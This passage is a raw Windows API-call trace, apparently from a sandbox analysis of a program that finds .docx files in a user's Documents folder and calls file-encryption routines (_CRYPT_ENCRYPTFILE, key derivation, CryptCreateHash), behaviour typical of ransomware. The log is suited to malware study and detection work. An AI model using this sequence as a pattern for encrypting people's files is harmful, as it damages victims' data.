RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0180.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0180.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0180.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0180.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0180.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0180.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0180.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0180.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0180.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0180.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0180.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0180.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0180.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0180.436] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0180.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0180.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0180.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.437] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4c8 [0180.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd4c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0180.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.437] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0180.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0180.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0180.438] CloseHandle (hObject=0x138) returned 1 [0180.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0180.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0180.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0180.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0180.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0180.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0180.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0180.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0180.439] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0180.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0180.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0180.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0180.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0180.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0180.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0180.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0180.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0180.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.440] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0180.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0180.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.440] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0180.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0180.440] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.440] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0180.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0180.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.440] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.470] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6343b140, ftCreationTime.dwHighDateTime=0x1d5966d, ftLastAccessTime.dwLowDateTime=0x1a09100, ftLastAccessTime.dwHighDateTime=0x1d59993, ftLastWriteTime.dwLowDateTime=0x1a09100, ftLastWriteTime.dwHighDateTime=0x1d59993, nFileSizeHigh=0x0, nFileSizeLow=0x143af, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ZZwMa.docx", cAlternateFileName="ZZWMA~1.DOC")) returned 0x90add8 [0180.472] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.472] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6343b140, ftCreationTime.dwHighDateTime=0x1d5966d, ftLastAccessTime.dwLowDateTime=0x1a09100, ftLastAccessTime.dwHighDateTime=0x1d59993, ftLastWriteTime.dwLowDateTime=0x1a09100, ftLastWriteTime.dwHighDateTime=0x1d59993, nFileSizeHigh=0x0, nFileSizeLow=0x143af, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ZZwMa.docx", cAlternateFileName="ZZWMA~1.DOC")) returned 0x90add8 [0180.472] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZwMa.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.474] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0180.474] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0180.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.475] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6343b140, ftCreationTime.dwHighDateTime=0x1d5966d, ftLastAccessTime.dwLowDateTime=0x1a09100, ftLastAccessTime.dwHighDateTime=0x1d59993, ftLastWriteTime.dwLowDateTime=0x1a09100, ftLastWriteTime.dwHighDateTime=0x1d59993, nFileSizeHigh=0x0, nFileSizeLow=0x143af, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="ZZwMa.docx", cAlternateFileName="ZZWMA~1.DOC")) returned 0x90ae18 [0180.475] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0180.475] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0180.475] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.475] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0180.475] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0180.475] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.476] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0180.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0180.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0180.476] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0180.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0180.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0180.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0180.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0180.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0180.477] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0180.477] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0180.477] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0180.478] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0180.478] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.478] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0180.478] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.478] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0180.478] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.478] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0180.478] 